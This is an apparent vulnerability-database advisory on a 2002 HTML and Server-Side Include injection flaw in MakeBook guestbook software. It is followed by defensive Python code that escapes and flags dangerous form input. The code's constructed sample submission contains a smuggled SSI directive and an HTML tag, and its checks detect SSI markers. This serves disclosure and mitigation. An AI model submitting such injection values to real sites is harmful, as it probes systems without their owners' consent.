vendor: Guestbook Software
by: SecurityFocus
CVSS: 7.5 (HIGH)
CWE: 20 (Input Validation Vulnerability)
Product Name: Guestbook Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002
MakeBook Guestbook Software Input Validation Vulnerability
The MakeBook guestbook software does not sufficiently sanitize potentially dangerous characters from form field input. This may enable attackers to inject arbitrary HTML into form fields, which will be stored on guestbook pages. Additionally, it has been demonstrated that SSI (Server-Side Includes) may also be injected in this manner, and may be executed depending on the underlying environment.
Mitigation:
Input validation should be performed to ensure that user-supplied data does not contain malicious code.
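One way to apply this mitigation to a guestbook entry before it is stored, shown as an added example (this is not MakeBook's code). The field names, length limits and function names are assumptions, and the sample submission is constructed.

```python
import html
import re
import unicodedata

# Hypothetical field names and limits; the page does not list MakeBook's form fields.
FIELD_LIMITS = {"name": 64, "email": 128, "message": 2000}
TAG_START = re.compile(r"<\s*/?\s*[a-zA-Z]")


def clean_field(name, value):
    """Return (safe_text, flags) for one submitted form field."""
    flags = []
    # Flag suspicious input for logging; neutralizing it is done by the escaping below.
    if "<!--#" in value:
        flags.append("ssi-directive")
    if TAG_START.search(value):
        flags.append("html-tag")
    # Normalize, then drop control/format characters (newlines survive only in the message).
    value = unicodedata.normalize("NFC", value)
    keep = "\n" if name == "message" else ""
    value = "".join(c for c in value if c in keep or unicodedata.category(c)[0] != "C")
    # Truncate before escaping so an entity such as &lt; is never cut in half.
    if len(value) > FIELD_LIMITS[name]:
        value = value[: FIELD_LIMITS[name]]
        flags.append("truncated")
    # Escaping &, <, > and quotes turns markup into inert text; with no literal "<"
    # left, the stored page contains no "<!--#" sequence for an SSI parser to act on.
    return html.escape(value, quote=True), flags


def render_entry(form):
    """Build the stored HTML fragment for one entry from a dict of raw fields."""
    safe, report = {}, {}
    for name in FIELD_LIMITS:
        safe[name], flags = clean_field(name, form.get(name, ""))
        if flags:
            report[name] = flags
    fragment = (
        '<div class="entry"><p class="who">{name} &lt;{email}&gt;</p>'
        "<p>{message}</p></div>"
    ).format(**safe)
    return fragment, report


# Constructed sample submission containing a tag, an SSI directive and a NUL byte.
SAMPLE = {
    "name": "visitor<b>",
    "email": "v@example.com",
    "message": 'hello <!--#echo var="DATE_LOCAL" --> world\x00',
}
```

The returned report can be logged so that submissions carrying tags or SSI directives are visible to whoever operates the guestbook.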